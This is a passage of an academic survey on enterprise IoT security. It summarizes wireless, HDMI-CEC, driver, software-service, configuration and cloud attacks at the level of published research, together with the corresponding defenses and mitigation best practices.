attacker then discardsthe stored link key and pairing can’t be performed [203].Finally, bluedepriving interrupts Bluetooth communication bycausing a conflict between a spoofed device and a legitimatedevice so that this legitimate device cannot pair throughBluetooth connection [204]. It must be noted that similarto other protocols, many Bluetooth attacks are dependent onimplementations, software versions, and use-cases of Bluetoothdevices.
IR Attacks.
IR communication is used in E-IoT in the formof IR flashers to control integrated devices (e.g., displays,projectors, blinds). As such, most of these systems use simple,line-of-sight receivers without any form of authentication fromthe remote. Many of the controlling codes are available fromonline sources in websites such as remote central [270].As such, it is trivial for an attacker to capture or emit IRcommands through line-of-sight [205]. A malicious attackercould simply use an IR blaster to control IR-enabled devicesand disrupt the operation of E-IoT systems [206]. In othercases, attackers may be able to reconfigure IR-enabled devicesas if they had the original device remote. In terms of E-IoT,if a device is reconfigured or reset, an E-IoT system may notbe able to communicate with these devices.
General Wireless Attacks.
In this category, we cover anyattacks that can apply to wireless in the The Industrial,Scientific, and Medical (ISM) frequency bands and is notunique to any communication protocol. Jamming attack cannegatively impact E-IoT system communication in multiplemodes of communication and fall under a specialized Denial-FOR EDUCATIONAL PURPOSES ONLY!ubmitted to Elsevier AdHoc Networks L. Puche Rondon, L. Babun, A. Aris, K. Akkaya, A. S. Uluagacof-Service attack. Specifically, jamming presents a majorthreat to wireless networks and any E-IoT device that useswireless networks (e.g., interfaces, sensors, relays), causingthe devices to fall offline. Several works and surveys havecovered jamming attacks against wireless communication thatcan be relevant to E-IoT systems [207]–[210]. Specifically,these surveys highlight several proven jamming techniquesagainst wireless networks (e.g., spot jamming, sweep jamming,barrage jamming, deceptive jamming). Further, jamming at-tacks are often cheap, easy to perform, and difficult to mitigate.The capabilities of more elaborate jamming attacks such asreactive jamming are covered by Wilhelm et al., highlightingthe dangers of reactive jamming in wireless networks, wherejamming techniques can target specific packets in wirelesscommunication [211]. While reactive jamming may have lim-itations due to cost, demonstrations of jamming attacks showthat an attacker can target specific wireless communication(e.g., ZigBee) with some technical knowledge and widely-available low-cost devices [212].
HDMI-Based Protocol Attacks.
HDMI is one of the core con-nections of video distribution and contains various protocolsthat can pose a threat to E-IoT systems. In HDMI-Walk, Pucheet al. demonstrated that the CEC protocol can be used to gainarbitrary control of CEC-supported device functions [217].Specifically, the authors demonstrated that CEC can be usedwith HDMI distributions to attack multiple HDMI devices.The HDMI-Walk attacks further showed that an attacker mightcontrol devices, transfer information, cause DoS conditions,eavesdrop, and otherwise harm HDMI networks through asingle point of connection or compromised device. For all ofthe attacks, the researchers inserted a device into an HDMI-capable distribution. The first attack used the inserted device togather information about all of the connected HDMI devices,returning details such as the language, model number, powerstate, and running version. Two more attacks proved thateavesdropping and facilitation of existing attacks are possiblewith CEC. The authors showed that CEC could be used forunauthorized data transfer by transferring audio informationand WPA handshakes from one end of the distribution toanother rogue device. Finally, there were two DoS attacksdemonstrated in HDMI-Walk. On the first attack, the attackerdevice was configured to identify televisions powering onthrough CEC broadcast and shutting the displays down beforethey initiated. The second DoS attack abused television inputchange and overwhelmed displays through CEC, causing themto become inoperable. Further, the authors of HDMI-Walknoted that CEC propagation is not obvious and difficult tomitigate, creating networks without the user’s awareness. Otherrelevant work on HDMI sub-protocols was published by theNCC group identified on CEC-based fuzzing vulnerabilitiesthrough CEC, and other viable threats through HDMI [218].Specifically, the NCC Group identified that HDMI’s HECchannel could be used for corporate boundary breach, endpointprotection circumvention, and unauthorized network extension.Similar work presented by Smith et al. contributed to furtherCEC-based fuzzing with the development of the tool CEC-STeR, used to execute CEC-based fuzzing attacks on CEC-supported devices [219], [220].
D. Mitigation of Communication Layer Attacks.
Serial-based Communication Defenses.
While not specificto E-IoT, research in serial-based communication defensemechanisms may apply to E-IoT. Studies by Dudak et al. [271],and Wilson et al. [272] provide insight into securing serial-based protocols and considerations that must be taken to designprotocols securely. Further, as standardization may help secureserial-based communication in ICS, the IEEE 1711.2 workinggroup’s efforts have focused on creating the Secure SCADAcommunications protocol [273]. A similar approach has notbeen taken for proprietary E-IoT communication protocols yet,but could guarantee interoperability and secure protocol designin the future. In a survey by Volkova et al. highlighting attacksand defenses [160], the authors noted that network security,best practices, and software updates may help mitigate threatsto Modbus and similar serial-based protocols. However, theauthors noted that even with existing mitigation strategies,there are vulnerabilities that have to be mitigated by theprotocol specifications. Finally, many proprietary protocolsmay require physical access to compromise, so controllingphysical access may be a viable mitigation strategy.For building automation protocols, vulnerabilities are oftendependent on the implementation and installation. ASHRAE,the compendium behind BACnet, has released a securityarchitecture to its initial construction for the deployment ofa security layer for BACnet networks [274]. In the addendum,ASHRAE acknowledges the need to update the 56-bit DEScryptographic standard used for communication since 2004to AES-128 bits. As several threats have been found in DESencryption, protocol updates are needed. Further, the BACNetspecification explicitly notes that BACnet security encryptionis optional and dependent on an integrator to be implemented.To keep E-IoT systems and related components secure, integra-tors should configure systems to use available encryption. Fur-ther, entities that create and maintain communication standardsmust update their protocols to newer cryptographic standards.
WiFi Defenses.
In a similar manner to many technologies, oneof the best solutions to defend against WiFi and other wirelessvulnerabilities is ensuring that the most secure protocol imple-mentations are in place in E-IoT devices. For instance, attacksand vulnerabilities such as Reaver have been patched in manymodern routers [170]. Literature also references other solutionssuch as experimental defense mechanisms (e.g., custom keygeneration practices, modified WiFi standards); however, asmost vendors and integrators cannot realistically implementthese mechanisms, they are outside of the scope of thissurvey [175]. In a similar manner to the individual networkconfiguration of devices, integrators should follow acceptedbest practices when configuring WiFi security, such as theones suggested by the United States Federal Trade Commission[166]. For instance, access to a network should be limited, androuters should be secured with strong passwords, custom SSIDnames, with management features. Strong passwords practicescan help mitigate handshake cracking and brute force attackson WiFi. Further, using WEP is considered insecure andoutdated, and as such, it should be avoided unless completelynecessary. Other best practices were also highlighted by theFOR EDUCATIONAL PURPOSES ONLY!ubmitted to Elsevier AdHoc Networks L. Puche Rondon, L. Babun, A. Aris, K. Akkaya, A. S. UluagacCybersecurity & Infrastructure Security Agency (CISA) [167].Some defenses proposed include installing firewalls, maintain-ing anti-virus software, frequent networking equipment up-dates, and following wireless configuration recommendationsfrom manufacturers. Several attacks can be prevented throughbest practices and proper configuration in WPA/WPA2 devices.For instance, disabling features such as WPS in routers may bea good practice to prevent threats such as the Reaver and Pixie-dust attacks [275]. Surveys conducted on WiFi security alsosuggest that if it is possible, users should update their systemsto the latest WPA3 security standard, however acknowledgethat this is not ideal in all cases [165], [176]. Further, thesesurveys note that proper configuration of WPA3 can preventkey cracking attacks.
ZigBee/Z-Wave Defenses.
One of the best solutions to Zigbeeand Z-wave protocol vulnerabilities is verifying that vendorsuse the latest and the most secure protocol implementations.Further, E-IoT integrators should follow the best practicesoffered by E-IoT vendors and manufacturers. A survey byLounis et al. highlighted how updated protocols have resolvedmany attacks for short-range wireless protocols [176]. Thissurvey also highlights that network administrators (integrators- in E-IoT systems) should monitor and verify that devicesare properly configured and updated. However, as users andintegrators of E-IoT systems rely on E-IoT device manufac-turers and vendors, solutions for vulnerabilities will come fromvendor updates and best practices. For instance, manufacturersof E-IoT controllers must make sure that short-range wirelessnonces are not reused to prevent key generation attacks [177].Additionally, a work by Benzaid et al. highlighted that pollingmessages and responses should also be authenticated to preventspoofing attacks on short-range wireless networks [178]. Anarticle published in 2006 on Z-wave security highlighted themain differences between ZigBee and Z-wave security [179].The article noted that Z-wave protocol encryption is optionaland for that reason, encryption should always be enabled asa security measure. The study also noted that older Z-Wavesystems are open to various attacks, especially if encryptionhas not been enabled. As such, maintaining systems properlyupdated and securely configured should be a priority for E-IoTcommunication.
Bluetooth Communication Defenses.
In a similar manner toother wireless defenses, one of the best solutions for Bluetoothattacks are updates and making sure that best practices are fol-lowed in Bluetooth configuration. A set of Bluetooth-specificbest practices have been proposed in [189]. For instance, dis-abling Bluetooth functions when they are not in use, disablingdevice ID broadcast, strong passwords, and verifying incomingtransmissions have been suggested to mitigate Bluetooth-basedthreats. Further, a survey by Lounis et al. [176] notes thatBluetooth software updates are necessary to defend againstwell-known Bluetooth attacks (e.g., bluechopping, bluecutting,bluedepriving).
IR Communication Defenses.
As IR communication is line-of-sight, physical security may be one of the best defenseapproaches. With very little literature on IR communicationand defenses, it may be an idea for integrators to cover IRreceivers when not in use to prevent attackers from tampering with devices. Further, access control may prevent unauthorizedusers from disrupting the operation of E-IoT-controlled devicesusing IR emitters. As IR requires line-of-sight, it may be easyto discern when an attacker is meddling with a device. Further,as CCTV can display the IR spectrum, it may be possible touse cameras to identify an attacker using IR to communicatewith devices [276].
General Wireless Communication Defenses.
Securing wire-less communication from jamming attacks has been a topicof research with a number of different approaches suggested.Numerous surveys are available on wireless jamming defensesand counter-measures [207]–[210], [213]–[216]. As such, asolution for E-IoT deployments will depend on the wirelesstechnology used and the particular wireless use-cases. A surveyon this topic by Aristides et al. divides anti-jamming ap-proaches into three different types: proactive, reactive, and mo-bile agent-based solutions [209]. Proactive counter-measuresin the background cannot be initiated, stopped, or resumed ondemand and require prolonged implementation time and highimplementation cost. An example of proactive measures aresoftware and hardware-based solutions that detect jammingattacks before they occur (e.g., DEEJAM) [277]. Reactiveanti-jamming approaches reduce computation energy costscompared to proactive counter-measures. Reactive jammingdefenses rely on active jamming attacks and aim to mitigateattacks (e.g., JAM) [278]. However, in the case of some jam-ming attacks, reactive-anti-jamming may have some detectiondelays. Finally, mobile agent-based solutions employ anti-jamming agents that move between hosts to detect jammingattempts. For different protocols, there exist different jammingapproaches, subject to surveys of their own. Vendors of E-IoTshould consider the best defenses for their supported devicesand implement them in their systems.
HDMI-based Communication Defenses.
While HDMI sub-protocols are usually secured through restrictions to physicalaccess; other options have been explored. For instance, in workproposed by Puche et al., the authors created a passive intru-sion detection system framework designed to protect againstHDMI-based threats [221]. The framework uses features inCEC communication to build a machine learning classifierand does not require modification to the original protocol, asa modification to the protocol is problematic, with billionsof HDMI devices distributed worldwide. Physical defensesagainst these attacks involve the use of CEC-less adapters,which can prevent CEC signal from propagating over largedistributions [279]. As such, an integrator may use a CEC-lessadapter to prevent public, easily-reachable HDMI endpointsfrom receiving CEC communication.VI. M
ONITORING AND A PPLICATIONS L AYER
In this section, we highlight the monitoring and applicationlayer of E-IoT systems. First, we cover elements of the E-IoT monitoring and applications layer. We then introducethe threat model at this layer. Third, we cover monitoringand application-layer threats and attacks. Finally, we providerelevant defenses and mitigation mechanisms. An overview ofattacks, threats, and mitigation strategies covered in this sectionare outlined in Table VI.FOR EDUCATIONAL PURPOSES ONLY!ubmitted to Elsevier AdHoc Networks L. Puche Rondon, L. Babun, A. Aris, K. Akkaya, A. S. UluagacTABLE VI: Summary of E-IoT Application Layer Attacks, Threats, and Mitigations.
Component Attack/Threat MitigationsE-IoT Drivers Driver-based Attacks [280] Treat drivers as untrusted software, avoid unverified drivers, user awareness. [280]E-IoT Software & Services Software Vulnerabilities [281]–[284] Frequent updates, isolated E-IoT devices, legacy equipment considerations, vulnerability awareness [285].Improper Encryption [286]–[288] Accepted encryption methodology, software verification [287].E-IoT Configuration Remote Hijacking [289], [290] Strong passwords, avoid port forwarding, VPNs, configuration best practices [291]–[293]
A. Elements of the Monitoring and Applications Layer
E-IoT Monitoring and Applications Layer consists of E-IoTdrivers, E-IoT software and services, and E-IoT configuration.
E-IoT Drivers.
As introduced in Section II, drivers are animportant part for E-IoT system functionality. As a software-based component of E-IoT systems, drivers provide all theinformation necessary for an E-IoT system to integrate a deviceor web service into the system. As such, E-IoT drivers are notstandardized from system-to-system and may be known undera different name (e.g., Crestron modules, Control4 Drivers)[280]. Drivers are inserted and configured in an E-IoT systemduring programming or maintenance by integrators. Thus,drivers can be obtained in three different ways. (1) Drivers maybe acquired directly from the E-IoT configuration software. (2)Drivers may be acquired from a catalog of drivers providedby the main E-IoT vendor. (3) Drivers can be downloadedfrom third-party sites (e.g., forums, device vendors, third-party developers). However, while many vendors will validatedrivers acquired from their software or repositories, driversfrom third-party sources are often not checked for maliciouscontent. Additionally, some drivers are not free which maytempt integrators to use a free, unverified driver with maliciouscode available online [41].
E-IoT Software Services.
E-IoT systems use several softwareservices for configuration and maintenance. Beyond propri-etary tools used by E-IoT vendors, such as Control4’s com-poser and Crestron’s Simpl, E-IoT uses common applicationservices [294], [295]. Available software services may varyfrom system to system. While E-IoT systems may have well-known, documented software services such as File TransferProtocol (FTP), Secure Shell (SSH), and Telnet communica-tion, E-IoT solutions may also run unknown proprietary ser-vices. With the closed-source nature of many E-IoT systems,documentation and details of these proprietary services remainmostly unavailable. As such, operating manuals available on-line and troubleshooting guides are among the few sourcesof information on these services. In contrast, well-known andcommonly-used services are easier to identify. For instance,file transfer is necessary for E-IoT tasks such as firmwareupgrades, image uploads, and vendor software configuration.As such, one of the accepted file-transfer services is FTP,and for more secure communication, Secure FTP (SFTP)[296], [297]. Another requirement for E-IoT is diagnostics andconfiguration; thus, integrators need to communicate directlyto the E-IoT system. Secure shell services may be used fordiagnostics and configuration as integrators use secure shellclients such as PuTTy to connect to, diagnose, and configureE-IoT system and system components through services such asTelnet or SSH [298], [299]. Another use-case of software ser-vices is webservers and web interfaces using HTTP or HTTPS. E-IoT systems may host webservers and web interfaces toallow integrators to configure, diagnose, or monitor devices.For instance, CCTV systems host a web interface to configurecameras, view recordings, view a live feed, and manageCCTV systems [300]. Finally, software suites such as Busyboxare common in IoT and E-IoT alike, as BusyBox providesmany common UNIX utilities in a compact executable withsize optimization and a modular design [301], [302]. Due tothe convenient design, E-IoT vendors such as Control4 runBusyBox on their main controllers and devices [303].
E-IoT Configuration.
Beyond software, configuration of E-IoT systems can impact the overall security of the system.Some E-IoT users may need to access E-IoT system featuresremotely. Additionally, remote access aids integrators, as itallows them to provide remote technical support, especially inmoving installations such as yachts. As such, E-IoT vendorsand integrators permit remote access through a variety ofdifferent methods. While the configuration is different for eachsystem, most E-IoT systems are accessed remotely throughsubscription services, virtual private networks (VPNs), or portforwarding. First, some vendors offer subscription services,creating a secure and easy way for clients and integrators toconnect remotely to an E-IoT system (e.g., Control4’s 4Sight)[304]. VPNs are another popular solutions recommended bymany vendors, granting users remote access to the E-IoT net-work and equipment. For this reason, vendors will recommendrouters with VPN functionality to integrators. Finally, as E-IoTdevices (e.g., controllers, CCTV NVRs) often use ports forcontrol and configuration, integrators often port forward thesedevices to allow remote access [291], [300], [305].
B. Threat Model for E-IoT Monitoring and Applications Layer
For monitoring and application layer threats, we considerMallory, an attacker knowledgeable on configuration and soft-ware vulnerabilities of E-IoT systems. As such, an attackeron this layer compromises E-IoT functionality and may gainaccess to unauthorized resources without any physical contactwith E-IoT systems. For this layer, an attacker needs techni-cal knowledge of E-IoT systems and software-based attacks.Mallory can be in the roles of malicious users, integrators, orremote attackers.
Users.
Mallory, in the role of a frequent or visiting malicioususer, could attack E-IoT systems through the monitoring andapplications layer. As malicious actors, these users may at-tempt privilege escalation, modify E-IoT systems, or otherwisetry to cause unintended operation. As regular users are meantto operate E-IoT systems and not alter any configuration, vul-nerabilities may allow Mallory to compromise E-IoT systemcomponents as an unprivileged user. Further, in an improperlyFOR EDUCATIONAL PURPOSES ONLY!ubmitted to Elsevier AdHoc Networks L. Puche Rondon, L. Babun, A. Aris, K. Akkaya, A. S. Uluagacconfigured network, if Mallory has network access and propri-etary configuration software, she may modify E-IoT software,remote access configuration, or compromise an E-IoT systemthrough software (e.g., malicious drivers).
Integrators.
Integrators often will have full access to E-IoTsystems. As a malicious integrator, Mallory may becomethe attacker in certain situations (e.g., bribed or disgruntledemployees [306]). In this scenario, Mallory already has theproprietary tools and access to one or many E-IoT systemsthrough maintenance software. Mallory could inadvertentlycompromise multiple systems using malicious drivers or re-mote access tools. Further, Mallory may target wealthy orfamous clients and eavesdrop on information for personal gainor otherwise disrupt E-IoT system operation.
Remote Attackers.
Mallory may be a remote attacker seekingsystems to compromise. She may find E-IoT systems exposedto the Internet. If Mallory is a more capable attacker, she mayuse configuration tools and manuals used by E-IoT vendors togain complete access to E-IoT systems, install malicious E-IoTdrivers, and otherwise compromise exposed systems.
C. Monitoring and Applications Layer Attacks and Vulnera-bilities
In this subsection, we cover monitoring and application layerattacks and vulnerabilities.
E-IoT Driver Attacks.
As explained in Section II, E-IoTdrivers contain all the programming necessary for E-IoTsystems to integrate third-party components such as devices,APIs, and web services [294], [307]. Research on the topicof E-IoT drivers by Puche et al. demonstrated that drivers canbe used to compromise E-IoT systems [280]. Specifically, theauthors performed a DoS attack, maliciously expended sys-tem resources, and assumed control of the E-IoT controller’snetworking functions through malicious E-IoT drivers. Theauthors note that an integrator may inadvertently compromisean E-IoT system by downloading unverified drivers from third-party vendors, forums, or any external site. Since there is noverification mechanism for drivers in E-IoT controllers, anattacker can gain the control of the E-IoT system.
E-IoT Software Service Attacks.
E-IoT systems will run acombination of proprietary services and well-known services intheir devices. As such, some vulnerabilities have been exposedby researchers on E-IoT systems. For instance, in Defcon 26(2017), Lawshae et al. presented several Crestron controllervulnerabilities [281]. Specifically, Crestron controllers couldbe compromised through the CTP console, a Telnet-like inter-face for Crestron E-IoT systems used to configure and diagnoseCrestron devices. This interface also allowed Lawshae to havedirect chip communication, browser remote control, UI inter-action, and microphone recording capabilities. Further, as ofthe time of this writing, CVE Details show over twenty vulner-abilities for Crestron devices and six for Savant systems [282],[283]. For Savant and Crestron systems, these vulnerabilitiesinclude de-authentication code overflow, authentication bypass,remote code execution, directory traversal, cross-site requestforgery, and DoS. Vulnerabilities have also been discoveredin presentation devices and systems. For instance, Crestron presentation devices, Barco wePresent, and Extron Share-Link presentation systems have had numerous vulnerabilitiesdiscovered (e.g., stack overflows, unauthenticated commandinjection) as they all share underlying code [284]. Vulnerabilityresearch by Synack, a company that specializes in securityresearch, tested the now discontinued SR-250 Control4 con-trollers and found several unpatched vulnerabilities describedas unauthenticated management vulnerabilities [286]. More-over, improper implementation of encryption could threatenthe confidentiality and integrity of E-IoT data. Practices suchas ’rolling your own encryption’ (e.g., implementing self-madecryptographic functions and algorithms) have left productsfrom companies (e.g., Dualcom, Telegram) vulnerable to at-tackers [287]. For instance, Dualcom alarm signaling productswere demonstrated to be vulnerable and susceptible to crackingattacks due to improper use of encryption mechanisms [288].As such, improperly implemented encryption can open up E-IoT components to a great number of attacks (e.g., malicioussniffing, brute-force, man-in-the-middle, replay).
E-IoT Configuration Attacks.
One of the most notableexamples of a failure in IoT security was made abundantlyclear with the Mirai botnet, which overwhelmed high profiletargets through DDoS attacks. The malware hijacked exposedIoT devices and used them to create a botnet. How the Miraimalware grew to a peak of six-hundred thousand infections soquickly is one of the reasons why users should be wary of thesecurity of their connected E-IoT systems and other Internet-facing devices [289]. Research on this botnet revealed issueswith the current state of exposed IoT and E-IoT devices. Miraicreated a bank of targeted devices with 46 unique passwords.Most of these passwords targeted exposed systems such assecurity cameras, CCTV video recorders, routers, and printers.Initially, Mirai used this bank of default passwords to bruteforce through Telnet and SSH authentication. Future iterationsof Mirai altered themselves to attack through known exploitsin targeted systems. Attacks such as these could also takeadvantage of known backdoors, such as those seen in DahuaDVRs and IP cameras, where a firmware had to be releasedfor all installed devices due to found vulnerabilities [290].An attacker could compromise an E-IoT system through portforwarded devices. As of the writing of this paper, a searchin Shodan.io, a search engine for exposed devices connectedto the Internet reveals over 30,000 E-IoT devices exposedonline from major vendors (Control4, Crestron, Savant, andLutron) [308].
D. Mitigation of Monitoring and Applications Layer Attacks
Driver Defenses.
E-IoT vendors will often provide a numberof drivers or validate drivers developed by third parties. Assuch, integrators should try to use validated drivers to preventdriver-based threats. The work that presented driver-basedattacks highlighted that vendors should approach drivers ina similar manner to untrusted software [280]. Further, withoutstandardization, drivers are implemented differently in eachsystem; thus, security mechanisms that are viable for one E-IoT system may not be viable for others. A proposed solution isa permission system for drivers, based on the function and whatFOR EDUCATIONAL PURPOSES ONLY!ubmitted to Elsevier AdHoc Networks L. Puche Rondon, L. Babun, A. Aris, K. Akkaya, A. S. Uluagaca driver should be allowed to do (e.g., a serial-based controlleddevice should not have a driver with network connectivity)[280]. Finally, many users and integrators may not be awarethat malicious code could exist in drivers and thus, awarenessof this possible threat is one of the best and only currentdefenses.
E-IoT Software and Services Defenses.
In a similar mannerto any smart system; vendors, users, and integrators shouldfollow patching and firmware best practices. As E-IoT vendorswill note and often patch vulnerabilities with later releases,integrators should install the latest software and firmwareversions. Moreover, users should schedule frequent productupdates [285]. Following frequent updates and patching in E-IoT systems can help mitigate known service vulnerabilitiesfrom software services. Further, overall awareness on runningservices and versions can help integrators gauge the risk ofexposing E-IoT components to a network. It may be possibleto anticipate unpatched vulnerabilities and prevent an attackbefore it occurs. As such, integrators may want to isolateE-IoT systems from other networked systems (e.g., guest-accessible networks) and enable proper network-based mecha-nisms to prevent unauthorized access. Additionally, legacy anddiscontinued equipment that cannot be upgraded or updatedpresents a major threat to many smart systems beyond E-IoT,especially Internet-facing systems. Integrators need to be awareof legacy equipment and make sure that their clients are awareof the risks of legacy equipment. Finally, E-IoT developersshould avoid mistakes during development such as improperencryption mechanisms by using the latest libraries, avoidingcustom encryption, and following verification processes [287].
E-IoT Configuration Defenses.
E-IoT vendors will oftenrelease security best practices, and integrators should followthese best practices for configuring E-IoT systems [291].Moreover, installers and users should avoid weak and insecurepasswords as Internet-facing devices with weak passwordpractices have allowed attackers to compromise devices inprevious large-scale automated attacks [289]. A whitepaperpublished by Synack provided an outline relevant to E-IoT, andprofessionally-installed systems [292]. Proposed best practicesfrom this guide highlighted that vendors and manufacturersshould not rely on users for security. Basic password strengthrequirements should be enforced, as compromising a remoteaccess account could give an attacker access to an E-IoTsystem. Users should also receive notifications when devicestatuses change or when sessions are initiated. Finally, thewhitepaper notes that vendors should avoid SSL pinning, self-signed certificates, and custom encryption. One other source ofvulnerabilities is port-forwarding, which exposes devices to theInternet. E-IoT vendors have always advised dealers and usersnot to port forward devices as some devices were not designedto be exposed directly to the Internet [293]. Instead, integratorsand users should opt for VPN configuration or vendor remoteaccess services. VII. B
USINESS L AYER
In this section, we highlight the E-IoT business layer andcommon security concerns. Specifically, we first address com-mon business-layer components of E-IoT systems. Second, we highlight possible threats and attacks. Finally, we coverpossible defense and mitigation mechanisms. An overview ofcomponents, threats, attacks, and mitigations discussed in thislayer can be found in Table VII.
A. Elements of the E-IoT Business Layer
In this subsection, we highlight common elements of theE-IoT Business Layer.
Security Cloud Services.
E-IoT CCTV systems usually recordcamera footage in local hard disk storage in a Digital VideoRecorder (DVR) or a Network Video Recorder (NVR) foranalog or IP cameras respectively [324]. However, if a DVRor NVR is damaged or stolen in traditional systems, all videorecordings are lost. Moreover, CCTV systems have limitedstorage space and will often overwrite old recordings with newfootage once storage runs out. As a solution to this issue, ven-dors offer online cloud storage solutions designed specificallyfor security cameras and CCTV. In addition to cloud storage,security cloud services allow integrators and users to managemultiple E-IoT deployments from a single hub. For instance,services beyond cloud storage include health checks, remoteaccess, and remote camera control for the end-user. Anotherfeature of security cloud services is machine-learning-basedtagging and human activity recognition on recorded video, withproviders such as Camio providing these features [46]. Withthis feature, recorded video data can be labeled by events (e.g.,van passing, pizza delivery, red shirt), allowing users to searchfor a specific events in stored recordings easily [325], [326].
Vendor Services.
E-IoT vendors will often offer cloud servicesfor monitoring and maintenance of E-IoT systems. Theseservices serve a variety of purposes as maintenance is animportant part of E-IoT deployments. First, maintenance ser-vices monitor integrated devices in the E-IoT system network.As such, an integrator can know when a device falls offlineand can address the issue before a client notices. Second,maintenance services can send integrators and clients phoneand email notifications on needed updates, unplanned down-time, Internet failure, and ongoing network issues. Servicessuch as Pakedge’s Bakpak are designed to work with E-IoT and provide vendors with many features. As such, theyallow integrators to provide both remote support, monitoring,and maintenance to multiple user E-IoT systems [327]. Cloudservices are also used in E-IoT for secure remote access to E-IoT systems. While not all of E-IoT systems offer this service,major E-IoT vendors or device makers always offer someform of remote access solution. For instance, services suchas Control4’s 4sight offer users remote access through mobileapps and cloud support. Further, 4sight also allows integratorsto service a specific E-IoT system remotely through a secureconnection.
B. Threat Model for E-IoT Business Layer
For this layer, we consider Mallory compromising an E-IoTsystem through the E-IoT Business layer. As such, Mallory isknowledgeable about cloud and remote services. Specifically,Mallory knows how to use business layer services (e.g.,FOR EDUCATIONAL PURPOSES ONLY!ubmitted to Elsevier AdHoc Networks L. Puche Rondon, L. Babun, A. Aris, K. Akkaya, A. S. UluagacTABLE VII: Overview of E-IoT Business Layer Attacks, Threats, and Mitigations.
Component Attack/Threat MitigationsSecurity and Vendor Data Breaches [309]–[322] Storage encryption, strong access control, accepted authentication practices, server-sidecloud services encryption.Insecure APIs and Web Services [309]–[322] Vulnerability scanning, malware protection, browser updates, data sanitation, web developmentbest practices.Unauthorized Intrusion [309]–[318] Network-based, host-based, distributed, and hypervisor IDS.Account Hijacking [309]–[322] Strong access control and authentication, two-factor authentication, web development bestpractices [317], [323].DoS Attacks [309]–[322] Rate-limiting, structured schemes, crypto puzzles, proxy filtering, load balancing reputation-basedaccess control, and flexible network configuration [317], [323]. security cloud, vendor maintenance) to compromise one ormultiple E-IoT systems remotely. As an attacker, in additionto knowledge on integrated services, Mallory must possessan Internet connection, knowledge on business services, andcapabilities to perform phishing attacks, dictionary attacks, orweb-based attacks. Mallory can be in the roles of hackers orintegrators to target business layer of E-IoT.
Hackers.
In this scenario, Mallory may be a remote attackerwith or without prior knowledge of E-IoT systems. Mallorymay target E-IoT cloud and vendor services and disruptthese systems. If Mallory is a more knowledgeable attacker,she may be aware that E-IoT systems can be compromisedthrough management services. Mallory may acquire sensitiveinformation from E-IoT systems such as CCTV recordings,schedules, and E-IoT usage patters. Further, Mallory can alsouse phishing techniques (e.g., texting, email, apps) to obtaina user’s or integrator’s credentials and compromise one ormultiple systems.
Malicious Integrators.
Mallory may be a malicious integratoror an insider in an integrator company with access to useraccounts and credentials for remote support. As such, Mallorycan become a malicious actor (e.g., disgruntled employees,insiders) and compromise a user’s E-IoT system to disruptor for personal gain. Additionally, as Mallory is an integratoror an employee, she may know E-IoT user’s financial orsocietal status. This may tempt Mallory to sell information(e.g., passwords, accounts, CCTV footage) of users to externalattackers for financial gain.
C. Business Layer Attacks and Vulnerabilities
Cloud Attacks.
As cloud services are a part of E-IoT, cloudservice threats and attacks are relevant to E-IoT systems. Whilearchitectures may vary from system to system and service toservice, threats to integrated cloud services could negativelyimpact E-IoT system security. As an active topic of research,several surveys have highlighted threats, attacks, and bestpractices in cloud computing [309]–[322]. Relevant to E-IoT,surveys by Liu et al., Ryan, and Shazad have highlightedseveral key challenges to cloud security [310]–[312]. Forinstance, these studies suggest that cloud components aresusceptible to DDoS attacks and that encryption solutions willnot protect sensitive data if the cloud provider cannot be trusteddue to insiders. A comprehensive survey by Fernandes et al.raised additional issues which may occur with cloud computing[317]. Issues related to unreliable computing, data storage,availability, cryptography, sanitation, and malware can arise from systems that rely on cloud services. Further, this surveyhighlights how keyloggers, phishing, malicious redirects, URL-guessing attacks, browser vulnerabilities, cross-site scripting,XML/SAML wrapping attacks, and MitM attacks may impactcloud services. Finally, a survey by Kumar et al. highlightssome of the common cloud security threats, such as databreaches, weak access control, insecure APIs, applicationvulnerabilities, account hijacking, malicious insiders, advancedpersistent threats (APT), data loss, nefarious use of cloudservices, DoS, and DDoS [323]. In terms of E-IoT, thesethreats could mean that E-IoT users may lose access totheir accounts, face information theft, or experience systemdowntime from integrated or vendor-provided cloud services.
D. Mitigation of Business Layer Attacks
Cloud Defenses.
Several defenses have been proposed forthreats that can impact cloud-based services. In this respect,several surveys have been conducted on the topic of cloudsecurity, often highlighting attacks, defenses, and mitigationmechanisms relevant to E-IoT cloud services [311], [315]–[317], [319], [321], [323]. Majority of these works note thatthere are many ways to attack different types of cloud systems.As such, different mitigation strategies exist for each threat.For instance, to defend against data breaches, properly imple-mented encryption should be used by cloud services. Vendorsshould require strong passwords and authentication practices intheir cloud services to address weak access control that couldcompromise users, integrators, and E-IoT systems. Further, asaccounts may be compromised, some articles have suggestedthat two-factor authentication may add an additional layer ofsecurity to cloud services [328]. As browser vulnerabilitiessuch as XSS and redirection attacks can impact web-basedGUI interfaces, users should update browsers, have malwareprotection, and follow best practices to prevent web-basedvulnerabilities. Surveys by Fernandes et al. and Kumar etal. specify mitigation strategies against cloud threats [317],[323]. For instance, APIs should be protected with goodsanitation practices, secure development standards, signatures,and encryption. To prevent intrusion in cloud systems, theauthors highlight that network-based, host-based, distributed,and hypervisor intrusion detection systems can be helpful.DDoS mitigation can improve the overall reliability of cloudservices in case of volumetric attacks. Specifically, DDoSmitigation strategies may take the form of rate-limiting, proxyfiltering, load balancing, crypto puzzles, and flexible networkconfiguration depending on the cloud system and use case. Assuch, E-IoT vendors and manufacturers should follow theseFOR EDUCATIONAL PURPOSES ONLY!ubmitted to Elsevier AdHoc Networks L. Puche Rondon, L. Babun, A. Aris, K. Akkaya, A. S. Uluagacpractices to guarantee the security of cloud-based componentsused in E-IoT.Cloud hosting can also benefit from privacy-preservingtechniques to protect a user’s information. For instance, cloudservice providers can provide an additional layer of mitigationby applying Homomorphic Encryption (HE) concepts to storedinformation [329]. With HE, concepts such as Partially Ho-momorphic Encryption (PHE), Somewhat Homomorphic En-cryption (SWHE), and finally Fully Homomorphic Encryption(FHE) can be applied to improve data privacy. Specifically,PHE, SWHE, and FHE allow for a number of operations(depending on the type) on encrypted data without the needto decrypt the data for these operations. This allows usersto store encrypted information, without the risk of exposingsensitive information to untrusted cloud providers. While theseapproaches are experimental and require further research, theyshould be considered for cloud services for E-IoT systems andstorage.VIII. L
ESSONS L EARNED AND O PEN I SSUES
In this survey, we analyzed the threats and defenses concern-ing individual layers. However, an attacker can follow a cross-layer approach, which means he/she can attack multiple layersat once. So the security of E-IoT systems should be consideredholistically. In this section, we cover lessons learned and openissues in state-of-the-art E-IoT security research.
A. Lessons Learned
Customized Deployments.
